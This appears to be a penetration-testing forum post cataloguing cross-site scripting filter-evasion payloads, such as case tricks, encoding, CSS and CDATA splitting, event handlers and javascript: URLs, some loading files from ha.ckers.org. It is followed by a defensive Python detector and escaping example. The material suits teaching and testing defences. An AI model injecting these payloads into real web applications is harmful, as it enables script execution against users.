中国网络渗透测试联盟

Title: Introduction to Cross Site Scripting (XSS) attack techniques

Author: admin    Time: 2012-12-31 09:59
Title: Introduction to Cross Site Scripting (XSS) attack techniques
1. Change the case of the characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade a regular-expression check

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab
         -> new line

    (the gaps inside "javascript" are a tab character in one variant and a newline in the other; this copy of the post shows them as plain spaces)

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be omitted)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

    (in this copy of the post the hex-encoded source has already been decoded, so each "Source" line reads the same as the rendered line above it)

9. Script in an HTML tag (event handler attributes)

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside a swf file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and reassemble it

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie through META

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
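Every technique in the list above defeats the same kind of defence: a filter that looks for the literal string `<script>` or `javascript:` instead of interpreting the input the way a browser will. The Python below is an added illustration written for this page, not code from the original post or its author. It places such a literal blocklist next to a detector that normalizes first (parses the markup so tag and attribute names are case-folded and `<SCRIPT/SRC=...>` still yields `script`; decodes numeric entities with or without the `;`; strips tabs, newlines and other control characters from URL attributes; removes CSS comments and resolves CSS backslash escapes) and next to plain output encoding. It covers several of the items at once (1, 5, 6, 7, 8, 9 and 14) rather than a single one. The sample inputs are constructed from the post's payloads with `alert(1)` as the body; the function names, the set of flagged tags and the http/https allowlist are my own choices, not anything the post specifies.

```python
import html
import re
from html.parser import HTMLParser

# Constructed samples, one per evasion technique taken from the post above.
SAMPLES = {
    "1 mixed case":       "<sCript>alert('d')</scRipT>",
    "5 junk in tag":      '<SCRIPT/SRC="t.js"></SCRIPT>',
    "6 tab/newline":      '<img src="jav\tascr\nipt:alert(\'XSS3\')">',
    "7 css backslash":    '<DIV STYLE="width: expre\\ssi\\on(alert(1));">',
    "7 css comment":      '<IMG STYLE="xss:expr/*anyword*/ession(alert(1))">',
    "8 hex entity":       '<IMG SRC="&#x6A;avascript:alert(1)">',
    "9 event handler":    '<body onload="alert(1)">',
    "14 javascript: url": "<IFRAME SRC=javascript:alert(1)></IFRAME>",
}
# Constructed benign fragment that a detector must NOT flag.
CLEAN = '<p class="note">hello <b>world</b> <a href="https://example.com/">site</a></p>'


def naive_blocklist_filter(fragment: str) -> str:
    """A literal, case-sensitive blocklist: the kind of filter the post's tricks defeat."""
    return fragment.replace("<script>", "").replace("javascript:", "")


ALLOWED_SCHEMES = {"http", "https"}          # assumption: allowlist chosen for this example


def normalize_url(value: str) -> str:
    """Decode entities (&#x6A; or &#106 without ';'), drop ASCII control characters
    and whitespace (tab, newline), and lower-case, so that 'jav\\tascr\\nipt:' and
    'JaVaScRiPt:' both read 'javascript:'."""
    value = html.unescape(value)
    value = "".join(ch for ch in value if ord(ch) > 0x20)
    return value.lower()


def is_safe_url(value: str) -> bool:
    """Allowlist: a relative reference, or an absolute URL with an http/https scheme."""
    head = normalize_url(value).split("/", 1)[0]
    if ":" not in head:
        return True                          # no scheme before the first '/': relative
    return head.split(":", 1)[0] in ALLOWED_SCHEMES


def normalize_css(value: str) -> str:
    """Strip /* comments */, resolve CSS escapes (\\65 -> 'e', \\s -> 's'), drop
    whitespace and lower-case, so 'expre\\ssi\\on' and 'expr/*x*/ession' both read
    'expression'."""
    value = re.sub(r"/\*.*?\*/", "", value, flags=re.S)
    value = re.sub(r"\\([0-9a-fA-F]{1,6})[ \t\n]?",
                   lambda m: chr(min(int(m.group(1), 16), 0x10FFFF)), value)
    value = value.replace("\\", "")          # '\s' is the escaped character 's'
    return re.sub(r"\s+", "", value).lower()


CSS_ACTIVE = re.compile(r"expression\(|javascript:")
ACTIVE_TAGS = {"script", "iframe", "frame", "frameset", "object", "embed",
               "link", "meta", "style", "xml", "base"}       # assumption: example set
URL_ATTRS = {"src", "href", "dynsrc", "lowsrc", "background", "action", "formaction"}


class ActiveContentDetector(HTMLParser):
    """Inspects markup the way a browser tokenizes it: HTMLParser lower-cases tag and
    attribute names and decodes entities in attribute values for us."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):                                   # item 9
                self.findings.append(f"event:{name}")
            elif name in URL_ATTRS and not is_safe_url(value):          # items 6, 8, 14
                self.findings.append(f"url:{name}")
            elif name == "style" and CSS_ACTIVE.search(normalize_css(value)):  # item 7
                self.findings.append("style:active")


def find_active_content(fragment: str) -> list:
    """Return the findings for a fragment; an empty list means nothing was flagged."""
    detector = ActiveContentDetector()
    detector.feed(fragment)
    detector.close()
    return detector.findings


def escape_for_html_body(fragment: str) -> str:
    """Output encoding for an HTML text context: '<', '>' and quotes become entities,
    so none of the samples is parsed as markup in the first place."""
    return html.escape(fragment, quote=True)


if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        bypassed = naive_blocklist_filter(sample) == sample
        print(f"{label:20} blocklist bypassed={bypassed!s:5} detector={find_active_content(sample)}")
    print("clean fragment:", find_active_content(CLEAN))
    print("escaped:", escape_for_html_body(SAMPLES["1 mixed case"]))
```

The detector is a recognizer, not a sanitizer: it tells you that a fragment contains active content after normalization, which is what a WAF rule or an input-validation check needs. For rendering user input, `escape_for_html_body` (or a real allowlist sanitizer for rich text) is the control that actually removes the risk, because it never lets the browser see the payload as markup regardless of which of the fourteen tricks was used.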

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2